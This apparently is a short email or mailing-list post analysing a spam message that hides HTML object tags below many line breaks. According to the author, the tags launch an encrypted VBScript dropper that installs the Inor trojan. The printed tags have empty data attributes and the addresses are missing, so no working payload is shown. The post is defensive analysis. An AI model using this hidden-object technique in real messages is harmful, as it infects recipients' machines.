Not a virus, spam combined
with social engineering combined with a malware installation
attempt.
We've received spam from this
dynamic IP in Brazil:
200-153-121-39.customer.tdatabrasil.net.br
[200.153.121.39]
Which was HTML formatted with
the message:
"Hey...haven't talked to you
guys in a while just wanted to see how things are going
ttyl"
and then many line breaks so as
to scroll off the message window, then:
<object
data=""
width=14>
<object data="" width=14>
<object data="" width=14>
<object data="" width=14>
<object data="" width=14>
which decode to this address in
China (heavily listed in ip4r, e.g. http://www.spamhaus.org/SBL/sbl.lasso?query=SBL10762 )
Which in turn are fired off,
perhaps invisibly to the user, and executes an encrypted VBScript whose purpose is to
create a "dropper" file called c:\x.exe and launch it. This in turn
downloads:
it then launches it to do
whatever. This last executable is UPX packed, and it in turn contains a
UPX packed section, so mstasks.exe is likely a dropper as well. I wasn't
interested in running it to find out.
Various bits of these files,
including the last executable are detected by McAfee as the Inor
trojan.
Inor has been around since 2002
and is definitely linked to further spam distribution via a
backdoor.
Andrew
8)
